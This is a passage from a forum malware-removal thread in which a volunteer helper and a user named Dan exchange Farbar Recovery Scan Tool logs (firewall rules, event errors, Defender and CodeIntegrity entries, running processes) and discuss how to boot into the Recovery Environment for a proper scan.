FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/12/2018 08:17:40 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 8b8
 
Start Time: 01d402ab38069555
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: 2b4c483d-6e9f-11e8-835c-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 09:42:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 7c4
 
Start Time: 01d401edd725fe22
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: ca66cabd-6de1-11e8-835b-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:58:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 894
 
Start Time: 01d401e7b235f644
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: a65dd9f3-6ddb-11e8-8359-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:45:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:45:44 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <20, 0x80070020, "">.
 
Error: (06/11/2018 08:45:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:26Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:25Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/12/2018 08:41:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The GamesAppIntegrationService service failed to start due to the following error: 
%%2 = The system cannot find the file specified.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:40 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/12/2018 08:37:05 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The 6320c4d4d9492959f6f8b43b8fdbf2f5 service failed to start due to the following error: 
%%1053 = The service did not respond to the start or control request in a timely fashion.
 
Error: (06/12/2018 08:37:05 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the 6320c4d4d9492959f6f8b43b8fdbf2f5 service to connect.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-12 20:36:48.243
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-12 20:16:24.029
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:40:11.899
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:18:22.725
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:52:06.834
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:17:14.808
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-10 20:22:12.478
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-09 19:37:48.069
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
==================== Memory info =========================== 
 
Processor: Intel® Celeron® CPU N2830 @ 2.16GHz
Percentage of memory in use: 45%
Total physical RAM: 3982.68 MB
Available physical RAM: 2169.89 MB
Total Virtual: 4686.68 MB
Available Virtual: 2949.03 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:444.65 GB) (Free:145.51 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: () (Removable) (Total:7.45 GB) (Free:2.36 GB) FAT32
 
\\?\Volume{3e80ab0f-bf50-4f22-8c02-3c22ee1a6bb4}\ (Recovery) (Fixed) (Total:0.88 GB) (Free:0.59 GB) NTFS
\\?\Volume{436d9e19-7fb5-4350-864c-86573ec335b2}\ () (Fixed) (Total:0 GB) (Free:0 GB) 
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 3F7852A4)
 
Partition: GPT.
 
========================================================
Disk: 1 (Protective MBR) (Size: 7.5 GB) (Disk ID: 00000000)
 
Partition: GPT.
 
==================== End of Addition.txt ============================


BC AdBot (Login to Remove)

 


#32 RayS

RayS

  • Malware Response Team
  • 2,434 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:11:04 AM

Posted 13 June 2018 - 11:00 PM

Hi Dan,

 

Here is the txt fix and addtion logs of doing that command prompt again.

I'm also going to do what you said in the last reply and will be back with the txt logs tomorrow.

Yes, please run the scan as instructed in Post #28.

 

Until we get a scan in Recovery Environment, all the logs are useless.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01
Ran by Dan (administrator) on BEATLES (12-06-2018 20:43:02)
Running from D:\
Loaded Profiles: Dan (Available Profiles: Dan)
Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal

Boot Mode must be in Recovery Environment.

 

Thank you,

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#33 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 15 June 2018 - 03:07 PM

Hello Ray , 

 

This is Dan.

 

All the past Command Prompts were not done by the method link you sent because it doe'snt work for my laptop.

Also I searched all the net and youtube to find other ways and it still did'nt work.

Then I realized when I right click on my Window 8 , there are menues to Command Prompt & Command Prompt run through Adminstrator.

All the past command prompts I ran that I sent you were done through this way , Command Prompt.

the only problem is it does it through normal boot mode and not through Recovery Mode as have you seen in all the logs.

 

If you have a solution to around this problem let me know.

 

I do have one way I did find on the net where I can go into Safe Mode by forcing it to boot through System Configuration utility by hit Windows+R to bring up the Run box. Type “msconfig” into the box, and then hit Enter.

 

I have not done this yet and will try it tomorrow and we'll see if that will work.

 

Here is the log again from the boot mode , scan I did , it may not help and also had to copy and paste it in word because

the computer I'm using during during the day can't open notepad.

I use another computer at night to send you logs from notepad but I won't have acess to that computer to sunday so for now ,

I'll be back with results on Monday

 

My Frst Txt - 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 06.06.2018 01

Ran by Dan (administrator) on BEATLES (14-06-2018 21:42:26)

Running from D:\

Loaded Profiles: Dan (Available Profiles: Dan)

Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe

(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe

(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe

() C:\ProgramData\dahhService\dahhService.exe

() C:\Program Files\Gramblr\gramblr.exe

(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

